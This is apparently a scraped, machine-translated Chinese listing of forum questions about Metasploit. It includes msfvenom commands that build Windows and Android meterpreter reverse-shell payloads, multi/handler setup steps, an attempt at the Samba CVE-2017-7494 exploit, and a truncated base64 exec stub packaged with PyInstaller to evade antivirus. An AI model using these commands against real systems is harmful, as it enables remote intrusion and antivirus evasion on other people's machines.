metasploit

    0熱度

    1回答

    我試圖創建一個使用msfvenom用下面的命令Metasploit的有效載荷拒絕的權限: msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=3333 -f exe -o /Users/<UserNameHere>/Desktop > shell.exe 但是,在執行時,我收到了-bash: shell.exe:

    0熱度

    1回答

    我一直試圖在MS中加載一個新模塊。我按照說明做了一個git克隆[文件地址]。然後,我將新文件複製到/root/.msf4/modules/exploits/windows/smb中,並複製到/ usr/share/metasploit-framework/modules/windows/smb中,然後發出reload_all並重新啓動msfconsole,但仍然無論我嘗試什麼但它仍然說: msf

    0熱度

    1回答

    我目前正在測試msfvenom android如何使用它的代碼。那麼我測試的AVD設備是紮根的,但後門沒有root權限。我添加了這些代碼,但仍然是一樣的。爲什麼我沒有root權限? Metepreter session's picture try { Process process = Runtime.getRuntime().exec("su"); pro

    0熱度

    2回答

    我想每分鐘自動運行metrpreter命令,不幸的是我沒有足夠的編程技巧來編寫bash腳本或python。 比如我想自動做這些: msfconsole use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST x.x.x.x set LPORT 443 exploit Meterpre

    1熱度

    1回答

    我正在編寫一個腳本來自動化met​​asploit,現在我的腳本工作正常,直到我需要在終端上運行的命令,但是當我嘗試運行我必須在內部執行的命令時metasploit控制檯腳本停止,直到我手動退出控制檯,然後它將從下一行繼續。 當您運行metasploit時,它將在您可以運行命令的終端內部打開一個控制檯(msfconsole)。 如何在我的腳本中添加特定命令以在控制檯內部運行? 這些是我想要運行的命

    -2熱度

    1回答

    「錯誤:無效的格式選擇」 msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.43.4 lport=4444 -f apk -o /var/www/html/files.apk 我試圖製作窗口的有效載荷,但它工作成功。 什麼應該怎麼辦

    1熱度

    1回答

    儘管它比較老,但在python中,您可以使用os.system()在終端中運行命令。 我的問題是,如果您輸入metasploit使用msfconsole,請執行os.system()調用將命令輸入到msfconsole中?

    0熱度

    1回答

    我對Msfvenom格式類型有疑問。 msfvenom --help-formats Executable formats asp, aspx, aspx-exe, axis2, dll, elf, elf-so, exe, exe-only, exe-service, exe-small, hta-psh, jar, jsp, loop-vbs, macho, msi, msi-nouac

    0熱度

    1回答

    我試圖利用linux內核漏洞samba cry(CVE-2017-7494)進行一些使用metasploit框架的研究工作。但我得到以下錯誤MSF開發(is_known_pipename)>運行 [*] Started reverse TCP handler on 192.168.78.136:4444 [*] 192.168.78.139:445 - Using location \\192.

    -2熱度

    1回答

    我正在編譯一個python代碼在kali。這些是PyInstaller的以下設置: pyinstaller -F /root/Desktop/Evil_private.py -i Evil_Private.exe 並且代碼只是用來避免反病毒檢測的一些註釋。以下代碼是: import base64,sys;exec(base64.b64decode({2:str,3:lambda b:bytes